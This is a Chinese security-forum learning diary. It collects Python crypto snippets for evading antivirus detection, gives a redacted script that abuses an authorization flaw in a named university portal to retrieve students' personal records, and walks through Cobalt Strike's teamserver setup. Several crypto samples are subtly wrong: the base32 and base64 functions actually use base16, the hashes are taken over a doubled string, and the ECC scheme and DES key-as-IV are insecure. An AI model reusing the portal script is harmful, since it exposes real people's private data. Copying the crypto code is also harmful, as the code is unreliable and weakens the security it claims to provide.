安全矩阵

 找回密码
 立即注册
搜索
楼主: Xor0ne

罗娇燕的学习日记

[复制链接]

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
 楼主| 发表于 2021-4-5 22:47:47 | 显示全部楼层
本帖最后由 Xor0ne 于 2021-4-7 22:17 编辑

2021/04/05

今天主要看的东西如下:
总结:是我太心急了,免杀这个东西需要沉下心去做,去分析才可!并非什么都是新鲜刺激的,平平淡淡乃至是枯燥才是技术本身的样子,而其中深层次的乐趣需要不断去摸索方才知晓!



今天看见的一些用python加密与解密的程序,想着日后免杀或许可以用得上,所以就保存下来了,整理如下。

常见几种加密算法的Python实现:
https://mp.weixin.qq.com/s?src=11×tamp=1617615631&ver=2990&signature=TOjk5yIJdp5J-cPHbiYY2*DQarW3tOmy-nW4ffOI89Dvj7FxrwZqfJe9UhX3bZ8ZsqyOiUe1DAx7kl-cPmMnPa355hjrD5tmQy8r6ZhNlihD3Bq9Yw4FAMr8KUeH4Yi8&new=1
常见加密算法的Python实现:
https://mp.weixin.qq.com/s?src=11×tamp=1617617061&ver=2990&signature=2nBzWxJwhhxvmBUDjdd4KpEfevN8AAeFrU8GY96yaXEzs-8itN4rSSH9JSqb5MYPZpEaSTy-6pt0oGGDj3q-u2jtJr0ICv38DOfDL8njYSEVVNvuKPGSHBl60dtw*NbC&new=1


目录如下:
0x01 base64加解密
0x02散列算法
1.MD5加密
2.SHA1加密
安全哈希加密技术,是当今世界最先近的加密算法。主要用于文件身份识别、数字签名和口令加密等。 对于长度小于2^64位的消息A,SHA1会产生一个160位的消息摘要B。且明文信息A和识别码B之间同时满足以下条件:
3. HMAC加密
0x03 对称密钥算法--分组密码
1.分组/块密码
(1)DES
(2)AES
(3)分组密码的四种模式
1、ECB模式
2、CBC模式(使用最多的模式)
(4)ECC加密
0x04非对称加密算法

0x01 base64加解密


参考链接:
Base64加密原理:https://blog.csdn.net/lazyer_dog/article/details/82628076
Base64就是一种基于64个可打印字符来表示二进制数据的方法。Base64加密方式是将三个八位的字节转化为四个六位的字节(不足八位的高位补00),3*8 = 4*6;所以base64加密过后的内容比原来的大三分之一;
  1. 举例:加密“ace”,
  2. ace转化为二进制为:‭01100001‬ ‭01100011‬ ‭01100101‬
  3. 转化为base64的四字节六位:011000 01‬‭0110 0011‬01 100101‬
  4. 那因为计算机是一字节八位的存数,所以高位补00后变为:
  5. 00011000 0001‬‭0110 000011‬01 00100101‬
  6. 转化为十进制:24 22 13 37
复制代码




查Base64对照表(默认版本RFC2045):

import base64

# 要加密的字符串
str_encrypt = 'hello!'
# 加密方法,encode-转化为byte类型
base64_encrypt = base64.b64encode(str_encrypt.encode())
# 将字节串转为字符串
base64_encrypt_str = base64_encrypt.decode()
print("BASE64加密串:", base64_encrypt_str, type(base64_encrypt_str))

# 解密方法,encode-字符串转为字节串
base64_decrypt = base64_encrypt_str.encode()
# 得到加密的字符串
str_decrypt = base64.b64decode(base64_decrypt).decode()
print("BASE64解密串:", str_decrypt, type(str_decrypt))

BASE64加密串: aGVsbG/vvIE= <class 'str'>
BASE64解密串: hello! <class 'str'>


0x02散列算法


1.MD5加密
MD5信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。
MD5算法的原理可简要的叙述为:MD5码以512位分组来处理输入的信息,且每一分组又被划分为16个32位子分组,经过了一系列的处理后,算法的输出由四个32位分组组成,将这四个32位分组级联后将生成一个128位(16字节)散列值。它对应任何字符串都可以加密成一段唯一的固定长度的代码,用于确保信息传输完整一致。目前MD5加密算法是不可逆的,当然这种方式加密的密文也不需要解密,需要的时候直接发送原始密文就好。
import hashlib

str_encrypt = "hello!"
# 对要加密的字符串进行加密
hash = hashlib.md5(str_encrypt.encode())
# dict1.update(dict2)函数把字典dict2的键/值对更新到dict1里
hash.update(str_encrypt.encode("utf8"))
# digest--返回摘要,作为二进制数据字符串值
value = hash.digest()
# 二进制
print("二进制的字符串", repr(value)) # repr函数将对象转化为供解释器读取的形式。

# 十六进制
# hexdigest--返回摘要,作为十六进制数据字符串值
print("十六进制的字符串", hash.hexdigest())



二进制的字符串 b'%\xe2\n\x04\x86\xa7\xf4\xc5Y@\xfa\xc7\xd6\xdc\t_'
十六进制的字符串 25e20a0486a7f4c55940fac7d6dc095f


2.SHA1加密
安全哈希加密技术,是当今世界最先近的加密算法。主要用于文件身份识别、数字签名和口令加密等。 对于长度小于2^64位的消息A,SHA1会产生一个160位的消息摘要B。且明文信息A和识别码B之间同时满足以下条件:
1、对于任意两条不同的明文信息A1、A2,其识别码B1、B2都不相同。
2、无法通过逆向算法由识别码B倒推出明文信息A。
通过散列算法可实现数字签名实现,数字签名的原理是将要传送的明文通过一种函数运算(Hash)转换成报文摘要,报文摘要加密后与明文一起传送给接受方,接受方将接受的明文产生新的报文摘要与发送方的发来报文摘要解密比较,如果不一致表示明文已被篡改。
import hashlib

str_encrypt = "hello!"

# 对要加密的字符串进行加密
hash = hashlib.sha1(str_encrypt.encode())
hash.update(str_encrypt.encode("utf8"))
value = hash.hexdigest()

# 十六进制
print("十六进制的字符串",value)

十六进制的字符串 b8b92f40e0c5df69dcf5cdc1e327e1f87188aeb9



3. HMAC加密
散列信息鉴别码(Hash Message Authentication Code), HMAC加密算法是一种安全的基于加密hash函数和共享密钥的消息认证协议。
实现原理是用公开函数和密钥产生一个固定长度的值作为认证标识,用这个标识鉴别消息的完整性。
import hmac
import hashlib


str_encrypt = "hello!"
key="abc"
# 第一个参数是密钥key,第二个参数是待加密的字符串,第三个参数是hash函数


mac = hmac.new(key.encode(encoding="utf-8"),str_encrypt.encode("utf8"),hashlib.md5)


value=mac.hexdigest()  # 加密后字符串的十六进制格式


# 十六进制
print("十六进制的字符串",value)



十六进制的字符串 221479c27474cdf1ee245ffef26cfeee


0x03 对称密钥算法--分组密码
1.分组/块密码
(1)DES


数据加密标准(Data Encryption Standard),属于对称加密算法。是一种使用密钥加密的块算法。接口参数有三个:Key、Data、Mode,Key为工作密钥;Data为8个字节64位,是要被加密或被解密的数据;Mode工作方式:加密或解密。


import binascii
from pyDes import des, CBC, PAD_PKCS5
# 需要安装 pip install pyDes


#加密过程
def des_encrypt(secret_key,s):
    iv = secret_key
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5)
    en = k.encrypt(s, padmode=PAD_PKCS5)
    return binascii.b2a_hex(en)


#解密过程
def des_decrypt(secret_key, s):
    iv = secret_key
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5)
    de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5)
    return de


secret_str = des_encrypt('12345678', 'hello!')
print(secret_str)


clear_str = des_decrypt('12345678', secret_str)
print(clear_str)



b'7c48af7e37ecd280'
b'hello!'


(2)AES


高级加密标准(Advanced Encryption Standard),又称Rijndael加密法,是美国联邦政府采用的一种区块加密标准。对加密快和密钥的字节数都有一定的要求,AES密钥长度的最少支持为128、192、256,加密块分组长度128位。需要知道密钥才能解密。
使用命令pip3 install pycryptodome,安装pycryptodome


(3)分组密码的四种模式
分组密码加密中的四种模式有ECB、CBC、CFB、OFB。其中最常见的有ECB和CBC。


1、ECB模式
对明文分组,每组明文通过加密算法和密钥位运算得到密文,之后按照顺序将计算所得的密文连在一起即可,各段数据之间互不影响。


#ECB加密模式

import base64
from Crypto.Cipher import AES

#使用补0方法

# # 需要补位,补足为16的倍数
def add_to_16(s):
    while len(s) % 16 != 0:
        s += '\0'
    return str.encode(s)  # 返回bytes


# 密钥长度必须为16、24或32位,分别对应AES-128、AES-192和AES-256
key = 'abc4567890abc458'
# 待加密文本
text = 'hello'
# 初始化加密器
aes = AES.new(add_to_16(key), AES.MODE_ECB)
# 加密
encrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\n', '')
# 解密
decrypted_text = str(
    aes.decrypt(base64.decodebytes(bytes(encrypted_text, encoding='utf8'))).rstrip(b'\0').decode("utf8"))


print('加密值:', encrypted_text)
print('解密值:', decrypted_text)



加密值: p3i7p25Ypel2X2yrFG4rCQ==
解密值: hello


2、CBC模式(使用最多的模式)

CBC模式需要一个初始化向量iv(和密钥长度相等的字符串),一般通过密钥生成器获取。


加密步骤如下:
1)首先将数据分组得到D1D2…Dn
2)第一组数据D1与初始化向量iv位运算的结果进行加密得到第一组密文C1
3)第二组数据D2与第一组的加密结果C1位运算以后的结果进行加密,得到第二组密文C2
4)之后的数据以此类推,得到Cn
5)按顺序连为C1C2C3…Cn即为加密结果。

特点:
1.不容易主动攻击,安全性好于ECB,适合传输长度长的报文,是SSL、IPSec的标准。每个密文块依赖于所有的信息块,明文消息中一个改变会影响所有密文块
2.发送方和接收方都需要知道初始化向量
3.加密过程是串行的,无法被并行化(在解密时,从两个邻接的密文块中即可得到一个平文块。因此,解密过程可以被并行化。)
4.解密时初始化向量必须相同


CBC加密模式(一)


#CBC加密模式
import base64
from Crypto.Cipher import AES
from urllib import parse
AES_SECRET_KEY = 'helloBrook2abcde'  # 此处16|24|32个字符
IV = 'helloBrook2abcde'
# padding算法
BS = len(AES_SECRET_KEY)
# 填充方案
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
# 解密时删除填充的值
unpad = lambda s: s[0:-ord(s[-1:])]
def cryptoEn(string, key, iv):
# param string: 原始数据
# param key: 密钥
# param iv: 向
    mode = AES.MODE_CBC
    cipher = AES.new(key.encode("utf8"),mode,iv.encode("utf8"))
    encrypted = cipher.encrypt(bytes(pad(string), encoding="utf8"))
    return base64.b64encode(encrypted).decode("utf-8")
#CBC模式的解密代码
def cryptoDe(destring, key, iv):
# param destring: 需要解密的数据
# param key: 密钥
# param iv: 向量
    mode = AES.MODE_CBC
   
    decode = base64.b64decode(destring)
    cipher = AES.new(key.encode("utf8"),mode,iv.encode("utf8"))
    decrypted = cipher.decrypt(decode)
    return unpad(decrypted).decode("utf-8")
secret_str = cryptoEn('hello', AES_SECRET_KEY,IV)
print("加密值:",secret_str)
clear_str = cryptoDe(secret_str.encode("utf8"), AES_SECRET_KEY,IV)
print("解密值:",clear_str)



加密值: sqlpZ0AdaRAOQRabchzltQ==
解密值: hello


CBC解密模式(二)


import base64
from Crypto.Cipher import AES


AES_SECRET_KEY = 'helloBrook2abcde'  # 此处16|24|32个字符
IV = 'helloBrook2abcde'


# padding算法
BS = len(AES_SECRET_KEY)
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[-1:])]




class AES_ENCRYPT(object):
    def __init__(self):
        self.key = AES_SECRET_KEY
        self.mode = AES.MODE_CBC


    # 加密函数
    def encrypt(self, text):
        cryptor = AES.new(self.key.encode("utf8"), self.mode, IV.encode("utf8"))
        self.ciphertext = cryptor.encrypt(bytes(pad(text), encoding="utf8"))
        # AES加密时候得到的字符串不一定是ascii字符集的,输出到终端或者保存时候可能存在问题,使用base64编码
        return base64.b64encode(self.ciphertext).decode("utf-8")


    # 解密函数
    def decrypt(self, text):
        decode = base64.b64decode(text)
        cryptor = AES.new(self.key.encode("utf8"), self.mode, IV.encode("utf8"))
        plain_text = cryptor.decrypt(decode)
        return unpad(plain_text).decode("utf-8")




if __name__ == '__main__':
    aes_encrypt = AES_ENCRYPT()
    text = "Python"
    e = aes_encrypt.encrypt(text)
    d = aes_encrypt.decrypt(e)
    print(text)
    print(e)
    print(d)



待加密字符串:Python
加密值:X09JC6IqnsDFp9b9C57cUA==
解密值:Python


如果字符串包含中文,先对文本转ascii码,将支持中文加密
text = base64.b64encode(text.encode('utf-8')).decode('ascii')






(4)ECC加密


全称:椭圆曲线加密(Elliptic Curve Cryptography),ECC加密算法是一种公钥加密技术,以椭圆曲线理论为基础。利用有限域上椭圆曲线的点构成的Abel群离散对数难解性,实现加密、解密和数字签名。将椭圆曲线中的加法运算与离散对数中的模乘运算相对应,就可以建立基于椭圆曲线的对应密码体制。


# -*- coding:utf-8 *-
# author: DYBOY
# reference codes: https://blog.dyboy.cn/websecurity/121.html
# description: ECC椭圆曲线加密算法实现
"""
    考虑K=kG ,其中K、G为椭圆曲线Ep(a,b)上的点,n为G的阶(nG=O∞ ),k为小于n的整数。
    则给定k和G,根据加法法则,计算K很容易但反过来,给定K和G,求k就非常困难。
    因为实际使用中的ECC原则上把p取得相当大,n也相当大,要把n个解点逐一算出来列成上表是不可能的。
    这就是椭圆曲线加密算法的数学依据
    点G称为基点(base point)
    k(k<n)为私有密钥(privte key)
    K为公开密钥(public key)
"""


def get_inverse(mu, p):
    """
    获取y的负元
    """
    for i in range(1, p):
        if (i*mu)%p == 1:
            return i
    return -1


def get_gcd(zi, mu):
    """
    获取最大公约数
    """
    if mu:
        return get_gcd(mu, zi%mu)
    else:
        return zi


def get_np(x1, y1, x2, y2, a, p):
    """
    获取n*p,每次+p,直到求解阶数np=-p
    """
    flag = 1  # 定义符号位(+/-)


    # 如果 p=q  k=(3x2+a)/2y1mod p
    if x1 == x2 and y1 == y2:
        zi = 3 * (x1 ** 2) + a  # 计算分子      【求导】
        mu = 2 * y1    # 计算分母


    # 若P≠Q,则k=(y2-y1)/(x2-x1) mod p
    else:
        zi = y2 - y1
        mu = x2 - x1
        if zi* mu < 0:
            flag = 0        # 符号0为-(负数)
            zi = abs(zi)
            mu = abs(mu)


    # 将分子和分母化为最简
    gcd_value = get_gcd(zi, mu)     # 最大公約數
    zi = zi // gcd_value            # 整除
    mu = mu // gcd_value
    # 求分母的逆元  逆元: ∀a ∈G ,ョb∈G 使得 ab = ba = e
    # P(x,y)的负元是 (x,-y mod p)= (x,p-y) ,有P+(-P)= O∞
    inverse_value = get_inverse(mu, p)
    k = (zi * inverse_value)


    if flag == 0:                   # 斜率负数 flag==0
        k = -k
    k = k % p
    # 计算x3,y3 P+Q
    """
        x3≡k2-x1-x2(mod p)
        y3≡k(x1-x3)-y1(mod p)
    """
    x3 = (k ** 2 - x1 - x2) % p
    y3 = (k * (x1 - x3) - y1) % p
    return x3,y3


def get_rank(x0, y0, a, b, p):
    """
    获取椭圆曲线的阶
    """
    x1 = x0             #-p的x坐标
    y1 = (-1*y0)%p      #-p的y坐标
    tempX = x0
    tempY = y0
    n = 1
    while True:
        n += 1
        # 求p+q的和,得到n*p,直到求出阶
        p_x,p_y = get_np(tempX, tempY, x0, y0, a, p)
        # 如果 == -p,那么阶数+1,返回
        if p_x == x1 and p_y == y1:
            return n+1
        tempX = p_x
        tempY = p_y


def get_param(x0, a, b, p):
    """
    计算p与-p
    """
    y0 = -1
    for i in range(p):
        # 满足取模约束条件,椭圆曲线Ep(a,b),p为质数,x,y∈[0,p-1]
        if i**2%p == (x0**3 + a*x0 + b)%p:
            y0 = i
            break


    # 如果y0没有,返回false
    if y0 == -1:
        return False


    # 计算-y(负数取模)
    x1 = x0
    y1 = (-1*y0) % p
    return x0,y0,x1,y1


def get_graph(a, b, p):
    """
    输出椭圆曲线散点图
    """
    x_y = []
    # 初始化二维数组
    for i in range(p):
        x_y.append(['-' for i in range(p)])


    for i in range(p):
        val =get_param(i, a, b, p)  # 椭圆曲线上的点
        if(val != False):
            x0,y0,x1,y1 = val
            x_y[x0][y0] = 1
            x_y[x1][y1] = 1


    print("椭圆曲线的散列图为:")
    for i in range(p):              # i= 0-> p-1
        temp = p-1-i        # 倒序


        # 格式化输出1/2位数,y坐标轴
        if temp >= 10:
            print(temp, end=" ")
        else:
            print(temp, end="  ")


        # 输出具体坐标的值,一行
        for j in range(p):
            print(x_y[j][temp], end="  ")
        print("")   #换行


    # 输出 x 坐标轴
    print("  ", end="")
    for i in range(p):
        if i >=10:
            print(i, end=" ")
        else:
            print(i, end="  ")
    print('\n')


def get_ng(G_x, G_y, key, a, p):
    """
    计算nG
    """
    temp_x = G_x
    temp_y = G_y
    while key != 1:
        temp_x,temp_y = get_np(temp_x,temp_y, G_x, G_y, a, p)
        key -= 1
    return temp_x,temp_y


def ecc_main():
    while True:
        a = int(input("请输入椭圆曲线参数a(a>0)的值:"))
        b = int(input("请输入椭圆曲线参数b(b>0)的值:"))
        p = int(input("请输入椭圆曲线参数p(p为素数)的值:"))   #用作模运算


        # 条件满足判断
        if (4*(a**3)+27*(b**2))%p == 0:
            print("您输入的参数有误,请重新输入!!!\n")
        else:
            break


    # 输出椭圆曲线散点图
    get_graph(a, b, p)


    # 选点作为G点
    print("user1:在如上坐标系中选一个值为G的坐标")
    G_x = int(input("user1:请输入选取的x坐标值:"))
    G_y = int(input("user1:请输入选取的y坐标值:"))


    # 获取椭圆曲线的阶
    n = get_rank(G_x, G_y, a, b, p)


    # user1生成私钥,小key
    key = int(input("user1:请输入私钥小key(<{}):".format(n)))


    # user1生成公钥,大KEY
    KEY_x,kEY_y = get_ng(G_x, G_y, key, a, p)


    # user2阶段
    # user2拿到user1的公钥KEY,Ep(a,b)阶n,加密需要加密的明文数据
    # 加密准备
    k = int(input("user2:请输入一个整数k(<{})用于求kG和kQ:".format(n)))
    k_G_x,k_G_y = get_ng(G_x, G_y, k, a, p)                         # kG
    k_Q_x,k_Q_y = get_ng(KEY_x, kEY_y, k, a, p)                     # kQ


    # 加密
    plain_text = input("user2:请输入需要加密的字符串:")
    plain_text = plain_text.strip()
    #plain_text = int(input("user1:请输入需要加密的密文:"))
    c = []
    print("密文为:",end="")
    for char in plain_text:
        intchar = ord(char)
        cipher_text = intchar*k_Q_x
        c.append([k_G_x, k_G_y, cipher_text])
        print("({},{}),{}".format(k_G_x, k_G_y, cipher_text),end="-")




    # user1阶段
    # 拿到user2加密的数据进行解密
    # 知道 k_G_x,k_G_y,key情况下,求解k_Q_x,k_Q_y是容易的,然后plain_text = cipher_text/k_Q_x
    print("\nuser1解密得到明文:",end="")
    for charArr in c:
        decrypto_text_x,decrypto_text_y = get_ng(charArr[0], charArr[1], key, a, p)
        print(chr(charArr[2]//decrypto_text_x),end="")


if __name__ == "__main__":
    print("*************ECC椭圆曲线加密*************")
    ecc_main()





0x04非对称加密算法


具体原理可以参考:https://www.jianshu.com/p/7a4645691c68
全称:Rivest-Shamir-Adleman,RSA加密算法是一种非对称加密算法。在公开密钥加密和电子商业中RSA被广泛使用。它被普遍认为是目前最优秀的公钥方案之一。RSA是第一个能同时用于加密和数字签名的算法,它能够抵抗到目前为止已知的所有密码攻击。


# -*- coding: UTF-8 -*-
# reference codes: https://www.jianshu.com/p/7a4645691c68


import base64
import rsa
from rsa import common


# 使用 rsa库进行RSA签名和加解密
class RsaUtil(object):
    PUBLIC_KEY_PATH = 'xxxxpublic_key.pem'  # 公钥
    PRIVATE_KEY_PATH = 'xxxxxprivate_key.pem'  # 私钥


    # 初始化key
    def __init__(self,
                 company_pub_file=PUBLIC_KEY_PATH,
                 company_pri_file=PRIVATE_KEY_PATH):


        if company_pub_file:
            self.company_public_key = rsa.PublicKey.load_pkcs1_openssl_pem(open(company_pub_file).read())
        if company_pri_file:
            self.company_private_key = rsa.PrivateKey.load_pkcs1(open(company_pri_file).read())


    def get_max_length(self, rsa_key, encrypt=True):
        """加密内容过长时 需要分段加密 换算每一段的长度.
            :param rsa_key: 钥匙.
            :param encrypt: 是否是加密.
        """
        blocksize = common.byte_size(rsa_key.n)
        reserve_size = 11  # 预留位为11
        if not encrypt:  # 解密时不需要考虑预留位
            reserve_size = 0
        maxlength = blocksize - reserve_size
        return maxlength


    # 加密 支付方公钥
    def encrypt_by_public_key(self, message):
        """使用公钥加密.
            :param message: 需要加密的内容.
            加密之后需要对接过进行base64转码
        """
        encrypt_result = b''
        max_length = self.get_max_length(self.company_public_key)
        while message:
            input = message[:max_length]
            message = message[max_length:]
            out = rsa.encrypt(input, self.company_public_key)
            encrypt_result += out
        encrypt_result = base64.b64encode(encrypt_result)
        return encrypt_result


    def decrypt_by_private_key(self, message):
        """使用私钥解密.
            :param message: 需要加密的内容.
            解密之后的内容直接是字符串,不需要在进行转义
        """
        decrypt_result = b""


        max_length = self.get_max_length(self.company_private_key, False)
        decrypt_message = base64.b64decode(message)
        while decrypt_message:
            input = decrypt_message[:max_length]
            decrypt_message = decrypt_message[max_length:]
            out = rsa.decrypt(input, self.company_private_key)
            decrypt_result += out
        return decrypt_result


    # 签名 商户私钥 base64转码
    def sign_by_private_key(self, data):
        """私钥签名.
            :param data: 需要签名的内容.
            使用SHA-1 方法进行签名(也可以使用MD5)
            签名之后,需要转义后输出
        """
        signature = rsa.sign(str(data), priv_key=self.company_private_key, hash='SHA-1')
        return base64.b64encode(signature)


    def verify_by_public_key(self, message, signature):
        """公钥验签.
            :param message: 验签的内容.
            :param signature: 对验签内容签名的值(签名之后,会进行b64encode转码,所以验签前也需转码).
        """
        signature = base64.b64decode(signature)
        return rsa.verify(message, signature, self.company_public_key)











回复

使用道具 举报

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
 楼主| 发表于 2021-4-7 22:34:08 | 显示全部楼层


2021年4月7日

如下为这两天看的,有点杂乱了。
今天下午开始看pwn了,隔了一段时间,似乎有点不大适应了,看着看着自己就开始烦躁起来了,静不下来,勉强着坚持了一会儿,实在是有点心不在焉,后来就搁置了,看了下python的optparse模块(为以后写脚本做铺垫)。base16/32/64加密的程序写了一个,算是python的练习吧。(做免杀时的感悟,多多加密免杀效果棒棒哒!因此就想着把一些加密程序收集起来,后期慢慢写出一个属于自己的加密小工具为免杀做准备吧!)
其实写着写着,发现编写代码其实挺有趣的,就看自己怎么去看待他了,



目录
0x01 python加解密(一)base

0x02 ecjtu抓包练习


# -*- coding: utf-8 -*-
"""
Created on Mon Apr  5 19:47:56 2021
2021/04/05-0407 base--by xorone
@author: 20544
"""
import base64

# base16的加密程序
def base16_encrypt(plain):
    str_plain = plain.encode()
    return base64.b16encode(str_plain).decode()

def base16_decrypt(plain):
    str_plain = plain.encode()
    return base64.b16decode(str_plain).decode()

# base32的加密程序
def base32_encrypt(plain):
    str_plain = plain.encode()
    return base64.b16encode(str_plain).decode()

def base32_decrypt(plain):
    str_plain = plain.encode()
    return base64.b16decode(str_plain).decode()

# base64的加密程序
def base64_encrypt(plain):
    str_plain = plain.encode()
    return base64.b16encode(str_plain).decode()

def base64_decrypt(plain):
    str_plain = plain.encode()
    return base64.b16decode(str_plain).decode()

def method(plain, crypt, t):  
    try:
        if crypt == 1: # 加密
            fun_name = 'base' + str(t) + '_encrypt'
            # print(eval(fun_name)(plain)) # eval执行拼接后的函数名
            return eval(fun_name)(plain)
        elif crypt == 2:
            fun_name = 'base' + str(t) + '_decrypt'
            # print(eval(fun_name)(plain))
            return eval(fun_name)(plain)
        else:
            # print("请选择正确的加密方式!")
            return '请选择正确的加密方式!'
    except:
        # print("请检测输入的base参数是否有错误!")
        return "请检测输入的base参数是否有错误!"



if __name__=="__main__":
    plain_text = input("请输入要字符串:")
    crypt = int(input("请选择加加密或解密:1.加密 2.解密 \n"))
    t = int(input("请选择要加密的类型:16.base16 32.base32 64.base64 \n"))
    crypt_text = method(plain_text, crypt, t)
    print('变化后的字符串为', crypt_text)


0x02 ecjtu抓包练习
今天恰好看见前几天发的一个任务,


这个我好像分析过,把自己以前写的代码放下面吧!
功能:通过一个学生的正确账号和密码可以查询某个学号学生的个人信息。(原因:利用越权漏洞)
如下,一下参数经过了脱敏处理。

# -*- coding: utf-8 -*-
"""
Created on Wed Mar 17 19:07:36 2021
智慧交大测试 -- 0317
@author: 20544
"""
import requests
import json



# 查看密码字符串加密后的值
# def crypto_passwd(passwd):
#     url = 'http://cas.ecjtu.edu.cn/cas/loginPasswdEnc'
#     headers = {
#         'Host': 'cas.ecjtu.edu.cn',
#         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0',
#         'cookie':'key_dcp_cas=XX!496990976; dcpcascookie=XX||neusoft||false||false',
#         'X-Requested-With': 'XMLHttpRequest',
#         'Origin': 'http://cas.ecjtu.edu.cn'
#         }

#     data = {
#             "pwd":"XX"
#             }

#     re = requests.post(url, headers=headers, data=data)
#     print("加密后的字符串为:\n"+re.text)


# 登录验证
# url = 'http://cas.ecjtu.edu.cn/cas/login '
# headers = {
#     'Host': 'cas.ecjtu.edu.cn',
#     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0',
#     'cookie':'key_dcp_cas=XX!XX; dcpcascookie=XX||neusoft||false||false',
#     'Content-Type': 'application/x-www-form-urlencoded',
#     'Origin': 'http://cas.ecjtu.edu.cn'
#     }
# data = {
#         "encodedService":"http%253a%252f%252fportal.ecjtu.edu.cn%252fdcp_sis%252fforward.action%253fpath%253d%252fportal%252fportal%2526p%253dsisxgxszhxxcx%2526sid%253dsis_xg%2526param%XX",
#         'service':'http%3A%2F%2Fportal.ecjtu.edu.cn%2Fdcp_sis%2Fforward.action%3Fpath%3D%2Fportal%2Fportal%26p%3Dsisxgxszhxxcx%26sid%3Dsis_xg%26param%XX',
#         'serviceName':'null',
#         'loginErrCnt':'0',
#         'username':'XX',
#         'password':'XX',
#         'lt':'LT-432178-XX'
#         }
# re = requests.post(url, headers=headers, data=data)
# print(re.text)


# # 输入学号返回个人信息
# def search_xh(number):
#     try:
#     # url = 'http://portal.ecjtu.edu.cn/dcp_sis/portal/gVarInit.jsp?p=sisxgxszhxxcx&gId=null&user_id=null&cid=null&template_type=1'
#         url = "http://portal.ecjtu.edu.cn/dcp_sis/xgcomm/xgcomm.action"
#         headers = {
#             'Host': 'portal.ecjtu.edu.cn',
#             'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0',
#             'Cookie':'key_dcp_sis_v6=XX!1469577997; key_dcp_v6=XX!1661723328; key_report_v6=XX!-1743436901;JSESSIONID=XX!1469577997',
#             'Origin': 'http://portal.ecjtu.edu.cn',
#             'render': 'json',
#             'clientType': 'json'
#             }
#         # data属于json格式,因此发送的时候需要转换为json格式
#         data = {"map":{"method":"getCommInfo","params":{"javaClass":"java.util.ArrayList","list":["base",number]}},"javaClass":"java.util.HashMap"}

#         re = requests.post(url, data=json.dumps(data), headers=headers)
#         print(re.json()['list'])

#     except:
#         print("查询失败!请检查学号是否输入错误!")

if __name__ == '__main__':
    # number = "XX"
    # search_xh(number)
    # crypto_passwd(XX);


            
   









回复

使用道具 举报

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
 楼主| 发表于 2022-1-4 22:24:27 | 显示全部楼层

CS文件学习

本帖最后由 Xor0ne 于 2022-1-6 15:17 编辑


【20210103】作者:xor0ne
参考链接:
cobalt skrike合法证书实现ssl加密通讯:
https://www.cnblogs.com/supdon/p/14688257.html

0x01 前景准备
1.文件夹结构
  1. |-cobaltstrike.auth # 客户端授权文件
  2. |-cobaltstrike.jar # 主文件
  3. |-cobaltstrike.store # 证书文件
  4. |-teamserver #服务器启动文件
  5. |-c2lint # 可用于测试修改后的.profile文件是否有用
  6. |-其他:破解文件、汉化文件、第三方插件(常见是.cna文件,基于sleep语言)等等
复制代码


2.服务器端和客户端启动
(1)服务端启动文件:teamserver
服务器端的启动文件:如下以Linux下为例,使用的是shell语言

1)从该文件中我们可以发现启动服务器端的必须是管理员权限的用户,即root:
  1. # check that we're r00t,检查执行用户是否是root权限
  2. if [ $UID -ne 0 ]; then
  3.     print_error "Superuser privileges are required to run the team server"
  4.     exit
  5. fi
复制代码


2)java环境必须安装。
  1. # check if java is available...
  2. if [ $(command -v java) ]; then
  3.     true
  4. else
  5.     print_error "java is not in \$PATH"
  6.     echo "    is Java installed?"
  7.     exit
  8. fi
复制代码


3)keytool必须可以使用。
keytools是什么?参考链接:https://blog.csdn.net/zlfing/article/details/77648430
Keytool 是一个Java 数据证书的管理工具 ,Keytool 将密钥(key)和证书(certificates)存在一个称为keystore的文件中 在keystore里,包含两种数据:
密钥实体(Key entity)——密钥(secret key)又或者是私钥和配对公钥(采用非对称加密)
可信任的证书实体(trusted certificate entries)——只包含公钥
  1. # check if keytool is available...
  2. if [ $(command -v keytool) ]; then
  3.     true
  4. else
  5.     print_error "keytool is not in \$PATH"
  6.     echo "    install the Java Developer Kit"
  7.     exit
  8. fi
复制代码


4)ketyools证书生成
  1. # generate a certificate
  2.     # naturally you're welcome to replace this step with your own permanent certificate.
  3.     # just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
  4.     # -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
  5.     # an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
  6.     # is printed so users may have a chance to verify they're not being owned.
  7. if [ -e ./cobaltstrike.store ]; then
  8.     print_info "Will use existing X509 certificate and keystore (for SSL)"
  9. else
  10.     print_info "Generating X509 certificate and keystore (for SSL)"
  11.     keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
  12. fi
复制代码


主要的生成指令如下,
  1. keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
复制代码


我们一一拆解然后分析。
  1. keytool
  2. -keystore ./cobaltstrike.store  # 指定密钥库的名称(产生的各类信息将不在.keystore文件中),即存储密钥的文件
  3. -storepass 123456 # 指定密钥库的密码(获取keystore信息所需的密码)
  4. -keypass 123456 # 指定别名条目的密码(私钥的密码)
  5. -genkey #在用户主目录中创建一个默认文件".keystore",还会产生一个mykey的别名,mykey中包含用户的公钥、私钥和证书
